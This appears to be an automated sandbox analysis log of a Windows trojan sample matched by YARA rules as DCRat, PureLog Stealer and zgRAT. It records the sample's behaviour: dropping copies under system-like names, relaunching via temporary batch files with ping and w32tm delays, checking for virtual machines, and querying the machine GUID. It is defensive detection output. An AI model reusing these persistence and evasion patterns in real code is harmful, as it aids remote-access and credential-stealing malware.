Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2376517379.000000001AE97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1858303340.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2250315704.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2376517379.000000001AE97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2708034930.000000001AFA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2524027388.000000001B77D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1967082208.0000000001050000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2264513709.000000001B2B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2153247490.000000001BC76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATAc!
Source: w32tm.exe, 0000002F.00000002.2480106126.00000256D0327000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2264513709.000000001B2C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: OH6KO8NBy1.exe, UserOOBEBroker.exe.0.dr, EGjcLJxUTLCptztefbFicvsgXASnZ.exe0.0.dr, EGjcLJxUTLCptztefbFicvsgXASnZ.exe.0.dr, Memory Compression.exe.0.dr, EGjcLJxUTLCptztefbFicvsgXASnZ.exe1.0.dr	Binary or memory string: HGfS1OICL5
Source: w32tm.exe, 0000003A.00000002.2663616165.0000025DC5397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1865148679.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2633450960.000000001BE3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: w32tm.exe, 00000004.00000002.1727439424.000001AC4DF77000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000005.00000002.1755142727.000000001B0E0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000016.00000002.2019011031.000001BFE5289000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000017.00000002.2034023305.000000000135C000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2153247490.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2361548844.0000000000826000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002A.00000002.2412805961.000001AC13D79000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000002B.00000002.2427862202.0000000001238000.00000004.00000020.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2708034930.000000001AEF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2524027388.000000001B6DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2633450960.000000001BDB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Queries volume information: C:\Users\user\Desktop\OH6KO8NBy1.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1750679777.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1859735247.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OH6KO8NBy1.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7992, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: OH6KO8NBy1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OH6KO8NBy1.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653332376.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\UserOOBEBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: OH6KO8NBy1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OH6KO8NBy1.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\UserOOBEBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1677336320.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
